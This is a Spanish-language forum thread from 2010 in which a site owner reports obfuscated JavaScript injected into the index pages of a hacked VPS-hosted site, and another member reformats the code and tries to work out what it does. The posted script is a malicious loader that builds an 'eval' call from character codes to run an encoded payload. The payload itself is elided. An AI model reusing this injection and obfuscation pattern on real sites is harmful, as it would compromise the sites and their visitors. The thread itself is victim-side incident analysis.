virus en archivo html? / y algunos php

Cergath · 11 Noviembre 2010, 21:40 PM

Hola... parece que hackearon un sitio que tenia, nada importante pero me preocupa, es de un VPS asi que tengo todos los permisos, tiene cpanel instalado...

en mis archivos index o home aparecieron de la nada estos codigos js:

Citar<script language="javascript">
var kasbd3412 = "";
$$ = function () { try{kasbd3412= $$dfsd(gnflseejrr()); kasbd3412.do(); } catch(e){ var bn = ""; return kasbd3412;}};
var adlan3r$oubw = "e";$$dfsd = this['a'+'s'+'d'];var adlan3r$ouaw = "a";
function asd(df_){this['r']="";
var s = df_;
for(__fh=0;this['__fh']<s['l'+adlan3r$oubw+'ng'+'t'+'h'];__fh++ ){i=__fh;if(s['ch'+adlan3r$ouaw +'rA'+'t'](i)=='Z'){this[neAR_DEF_FGEvftDSyTtnSoh_1]='%'} else {this[neAR_DEF_FGEvftDSyTtnSoh_1]=s['ch'+'ar'+'At'](this['i'])}this['r']=r+VAR_EZJrWcTGuhPYZJj(this,neAR_DEF_FGEvftDSyTtnSoh_1)}
return this['unesc'+adlan3r$ouaw + 'p'+adlan3r$oubw](r)}
var ez=window
VAR_AiCzwbiiMdphDXs=(function(VAR_JMFILTCeLQNWkAf,VAR_gqWQtFFAsjjtVqK){return VAR_JMFILTCeLQNWkAf[VAR_gqWQtFFAsjjtVqK];
});
VAR_EZJrWcTGuhPYZJj=(function(VAR_wiSIHKenjOMRPsE,VAR_SfXtSSNCWJXwgQF){return VAR_AiCzwbiiMdphDXs(VAR_wiSIHKenjOMRPsE,VAR_SfXtSSNCWJXwgQF);
});
function gnflseejrr() {return $a}var neAR_DEF_FGEvftDSyTtnSoh_1='s'+'1'; BKbk34b32=

Mas abajo luego de mas codigo.

Citarvar $a = BKbk34b32.replace(/98/g, "Z");
ez[String.fromCharCode(101,118,97)+'l']($$())
</script>
<script language="javascript">
var kasbd3412 = "";
$$ = function () { try{kasbd3412= $$dfsd(gnflseejrr()); kasbd3412.do(); } catch(e){ var bn = ""; return kasbd3412;}};
var adlan3r$oubw = "e";$$dfsd = this['a'+'s'+'d'];var adlan3r$ouaw = "a";
function asd(df_){this['r']="";
var s = df_;
for(__fh=0;this['__fh']<s['l'+adlan3r$oubw+'ng'+'t'+'h'];__fh++ ){i=__fh;if(s['ch'+adlan3r$ouaw +'rA'+'t'](i)=='Z'){this[neAR_DEF_FGEvftDSyTtnSoh_1]='%'} else {this[neAR_DEF_FGEvftDSyTtnSoh_1]=s['ch'+'ar'+'At'](this['i'])}this['r']=r+VAR_EZJrWcTGuhPYZJj(this,neAR_DEF_FGEvftDSyTtnSoh_1)}
return this['unesc'+adlan3r$ouaw + 'p'+adlan3r$oubw](r)}
var ez=window
VAR_AiCzwbiiMdphDXs=(function(VAR_JMFILTCeLQNWkAf,VAR_gqWQtFFAsjjtVqK){return VAR_JMFILTCeLQNWkAf[VAR_gqWQtFFAsjjtVqK];
});
VAR_EZJrWcTGuhPYZJj=(function(VAR_wiSIHKenjOMRPsE,VAR_SfXtSSNCWJXwgQF){return VAR_AiCzwbiiMdphDXs(VAR_wiSIHKenjOMRPsE,VAR_SfXtSSNCWJXwgQF);
});
function gnflseejrr() {return $a}var neAR_DEF_FGEvftDSyTtnSoh_1='s'+'1'; BKbk34b32=

Sigue mas y mas codigo hasta que acaba:

Citarvar $a = BKbk34b32.replace(/98/g, "Z");
ez[String.fromCharCode(101,118,97)+'l']($$())
</script>

Que podra ser?

Shell Root · 11 Noviembre 2010, 22:07 PM

Finalmente, el código queda así, dejame debugearlo y miro a ver que hace.

Código (javascript) [Seleccionar]

<script language="javascript">
    var kasbd3412 = "";
    $$ = function() {
        try {
            kasbd3412 = $$dfsd(gnflseejrr());
            kasbd3412.do();
        } catch (e) {
            var bn = "";
            return kasbd3412;
        }
    };
    var adlan3r$oubw = "e";
    $$dfsd = this['a' + 's' + 'd'];
    var adlan3r$ouaw = "a";

    function asd(df_) {
        this['r'] = "";
        var s = df_;
        for (__fh = 0; this['__fh'] < s['l' + adlan3r$oubw + 'ng' + 't' + 'h']; __fh++) {
            i = __fh;
            if (s['ch' + adlan3r$ouaw + 'rA' + 't'](i) == 'Z') {
                this[neAR_DEF_FGEvftDSyTtnSoh_1] = '%'
            } else {
                this[neAR_DEF_FGEvftDSyTtnSoh_1] = s['ch' + 'ar' + 'At'](this['i'])
            }
            this['r'] = r + VAR_EZJrWcTGuhPYZJj(this, neAR_DEF_FGEvftDSyTtnSoh_1)
        }
        return this['unesc' + adlan3r$ouaw + 'p' + adlan3r$oubw](r)
    }
    var ez = window
    VAR_AiCzwbiiMdphDXs = (function(VAR_JMFILTCeLQNWkAf, VAR_gqWQtFFAsjjtVqK) {
        return VAR_JMFILTCeLQNWkAf[VAR_gqWQtFFAsjjtVqK];
    });
    VAR_EZJrWcTGuhPYZJj = (function(VAR_wiSIHKenjOMRPsE, VAR_SfXtSSNCWJXwgQF) {
        return VAR_AiCzwbiiMdphDXs(VAR_wiSIHKenjOMRPsE, VAR_SfXtSSNCWJXwgQF);
    });

    function gnflseejrr() {
        return $a
    }
    var neAR_DEF_FGEvftDSyTtnSoh_1 = 's' + '1';
    BKbk34b32 =
    var $a = BKbk34b32.replace(/98/g, "Z");
    ez[String.fromCharCode(101, 118, 97) + 'l']($$())
</script>
<script language="javascript">
    var kasbd3412 = "";
    $$ = function() {
        try {
            kasbd3412 = $$dfsd(gnflseejrr());
            kasbd3412.do();
        } catch (e) {
            var bn = "";
            return kasbd3412;
        }
    };
    var adlan3r$oubw = "e";
    $$dfsd = this['a' + 's' + 'd'];
    var adlan3r$ouaw = "a";

    function asd(df_) {
        this['r'] = "";
        var s = df_;
        for (__fh = 0; this['__fh'] < s['l' + adlan3r$oubw + 'ng' + 't' + 'h']; __fh++) {
            i = __fh;
            if (s['ch' + adlan3r$ouaw + 'rA' + 't'](i) == 'Z') {
                this[neAR_DEF_FGEvftDSyTtnSoh_1] = '%'
            } else {
                this[neAR_DEF_FGEvftDSyTtnSoh_1] = s['ch' + 'ar' + 'At'](this['i'])
            }
            this['r'] = r + VAR_EZJrWcTGuhPYZJj(this, neAR_DEF_FGEvftDSyTtnSoh_1)
        }
        return this['unesc' + adlan3r$ouaw + 'p' + adlan3r$oubw](r)
    }
    var ez = window
    VAR_AiCzwbiiMdphDXs = (function(VAR_JMFILTCeLQNWkAf, VAR_gqWQtFFAsjjtVqK) {
        return VAR_JMFILTCeLQNWkAf[VAR_gqWQtFFAsjjtVqK];
    });
    VAR_EZJrWcTGuhPYZJj = (function(VAR_wiSIHKenjOMRPsE, VAR_SfXtSSNCWJXwgQF) {
        return VAR_AiCzwbiiMdphDXs(VAR_wiSIHKenjOMRPsE, VAR_SfXtSSNCWJXwgQF);
    });

    function gnflseejrr() {
        return $a
    }
    var neAR_DEF_FGEvftDSyTtnSoh_1 = 's' + '1';
    BKbk34b32 =
    var $a = BKbk34b32.replace(/98/g, "Z");
    ez[String.fromCharCode(101, 118, 97) + 'l']($$())
</script>

Cergath · 12 Noviembre 2010, 02:23 AM

Uyy que bueno, por fav or informame de los resultados que obtienes :/ and o algo preo cupad o

Cergath · 12 Noviembre 2010, 22:45 PM

tenes a lgo? es que m´e preocup´a bastante y no se si sea alarmante

Shell Root · 13 Noviembre 2010, 04:07 AM

Bueno, mirándolo, solo pude decodificar algunas variables. Pero aún falta, solo que esta el código donde esta definido las variables y funciones, pero no esta el código donde se invoca estás. Esto es importa ya que vemos los parámetros que son pasados a las funciones.

Intenta buscar más código.

Cergath · 13 Noviembre 2010, 16:35 PM

t agrade zco mucho tu tiem´po, de veras

tiene´s idea de como pudo infectarse? o que carajos puede hacer ese codigo?...

pd. no ocnozco mas de ese codigo, por ahora es l o unico que tengo, permite me buscar mas

Shell Root · 13 Noviembre 2010, 16:39 PM

Pues, cuando estuve trabajando en una empresa XXX -que por cierto, son unos *****, cabrones, hijos de p**a- cof, cof... Se les entro un virus así a todas las paginas que tenían alojadas en el servidor. Pero lo que hacia era SPAM. En este no se que es lo que hace. XD, tendría que ver los parámetros enviados.

Cergath · 13 Noviembre 2010, 20:57 PM

m mm puede ser que el pc tenga spyware y la maquina infectada que se conecta al pc haya infectado los archivos? porque por el vps, estoy ciertamente seguro de que no esta infectado, lo dudo muuuuucho...

Shell Root · 13 Noviembre 2010, 21:25 PM

Sería bastante bueno, que pusieras todo el código de algún archivo infectado. A ver si se logra mirar los parámetros.

Cergath · 14 Noviembre 2010, 16:10 PM

hla d nuevo, perdona digitar asi pero dsde un cel es complikdo, en fin...

primero que todo de verdad te agradezco mas que todo tu tiempo, en verdad,muchisimas gracias....

esta es una recopilacion de algunos archivos infectados que hi ce antes de eliminarlos, m i primera reac cion fue limpiar,luego deje unos pocos..
http://www.megaupload.com/?d=8CJHD9RM

algunos contienen es un codigo n php...

y bueno, aunque no descubramos bien que es, sabes de q se trata? q tipo de vulnerabilidad o malware puede ser? generalmente q hace y como puedo prvenirlo?

gracias